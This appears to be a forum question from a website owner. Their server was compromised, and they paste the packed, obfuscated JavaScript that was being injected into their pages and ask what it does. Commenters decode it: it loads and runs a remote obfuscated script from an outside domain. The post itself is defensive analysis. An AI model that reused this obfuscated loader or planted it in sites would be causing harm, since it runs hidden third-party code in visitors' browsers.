# why this javascript code can't be opened, anyone can helps?

Tags: javascript

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attackers website. (IPs of visitor/website, referrer, useragent etc, etc.) Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sort of requests (Mostly as poor man XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure at what it did, and after passing some dummy info, it returned this (which was being echoed into source)

```
<script> //<![CDATA[
eval(function(p, a, c, k, e, d) {
e = function(c) {
    return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if (!''.replace(/^/, String)) {
    while (c--) {
        d[e(c)] = k[c] || e(c)
    }
    k = [function(e) {
        return d[e]
    }];
    e = function() {
        return '\\w+'
    };
    c = 1
};
while (c--) {
    if (k[c]) {
        p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
    }
}
return p
}('F e=["\\z\\r\\n\\G\\C\\o","\\r\\n\\h\\t\\o\\h\\i\\A\\h\\y\\h\\w\\o","\\a\\a\\b\\H\\a\\a\\c\\s\\a\\a\\c\\s\\a\\a\\c\\a\\a\\a\\c\\f\\a\\a\\f\\J\\a\\a\\d\\j\\a\\a\\d\\j\\a\\a\\c\\f\\a\\a\\b\\j\\a\\a\\c\\m\\a\\a\\c\\d\\a\\a\\b\\f\\a\\a\\b\\m\\a\\a\\d\\i\\a\\a\\b\\p\\a\\a\\b\\c\\a\\a\\b\\i\\a\\a\\b\\p\\a\\a\\b\\m\\a\\a\\b\\q\\a\\a\\d\\i\\a\\a\\b\\f\\a\\a\\b\\j\\a\\a\\b\\D\\a\\a\\d\\j\\a\\a\\c\\s\\a\\a\\b\\m\\a\\a\\b\\D\\a\\a\\c\\a\\a\\a\\b\\q\\a\\a\\b\\T\\a\\a\\c\\s\\a\\a\\b\\m\\a\\a\\d\\j\\a\\a\\b\\p\\a\\a\\b\\c\\a\\a\\b\\i\\a\\a\\b\\p\\a\\a\\c\\a\\a\\a\\b\\q\\a\\a\\b\\m\\a\\a\\c\\H\\a\\a\\d\\j\\a\\a\\f\\d\\a\\a\\d\\i\\a\\a\\f\\m\\a\\a\\d\\j\\a\\a\\c\\f\\a\\a\\b\\f\\a\\a\\c\\d\\a\\a\\b\\p\\a\\a\\c\\a\\a\\a\\c\\s\\a\\a\\d\\i\\a\\a\\b\\D\\a\\a\\b\\p\\a\\a\\b\\i\\a\\a\\d\\i\\a\\a\\b\\J\\a\\a\\c\\f","\\t\\z\\L\\w\\r","\\o\\n\\N\\h","\\z\\n\\r","\\y\\t\\o\\r\\v","","\\A\\h\\w\\Z\\o\\v","\\U\\n\\u\\y\\q\\v\\t\\n\\q\\u\\x\\h","\\t\\C\\C\\h\\w\\x\\q\\v\\G\\A\\x","\\X\\u\\x\\L","\\n\\h\\y\\u\\Y\\h"];!I(){F k=K[e[1]](e[0]),l=e[2];k[e[3]]=e[4];k[e[5]]=I(k){F l,B=k[e[6]](/.{1,4}/g)||[],E=e[7];V(l=0;l<B[e[8]];l++){E+=O[e[9]](M(B[l],S))};P E}(l),K[e[R]][e[Q]](k),k[e[W]]()}()', 62, 62, '||||||||||x30|x36|x37|x32|_0x5578|x33||x65|x45|x46|_0xf0f8x1|_0xf0f8x2|x35|x72|x74|x39|x43|x63|x34|x61|x6F|x68|x6E|x64|x6D|x73|x6C|_0xf0f8x3|x70|x44|_0xf0f8x4|var|x69|x38|function|x41|document|x79|parseInt|x75|String|return|10|11|16|x31|x66|for|12|x62|x76|x67'.split('|'), 0, {}));
    //]]> </script>
```

Thank you for your time and patience with this matter.

Comment: I don't really feel like digging into this more because it seems like a massive waste of time, but the code you posted will add a script tag that points to the following script: https://source.igniel.com/template/igniplex/2.5/script.min.js

Maybe someone else feels like figuring this out, but the script is full of more obfuscated and packed stuff.

Comment: Looks like a CodeCanyon obfuscated script injection.

Comment: Probably you are just using a closed-source theme where the author need your site details just to make sure that you are a valid client that already purchase the license, legally.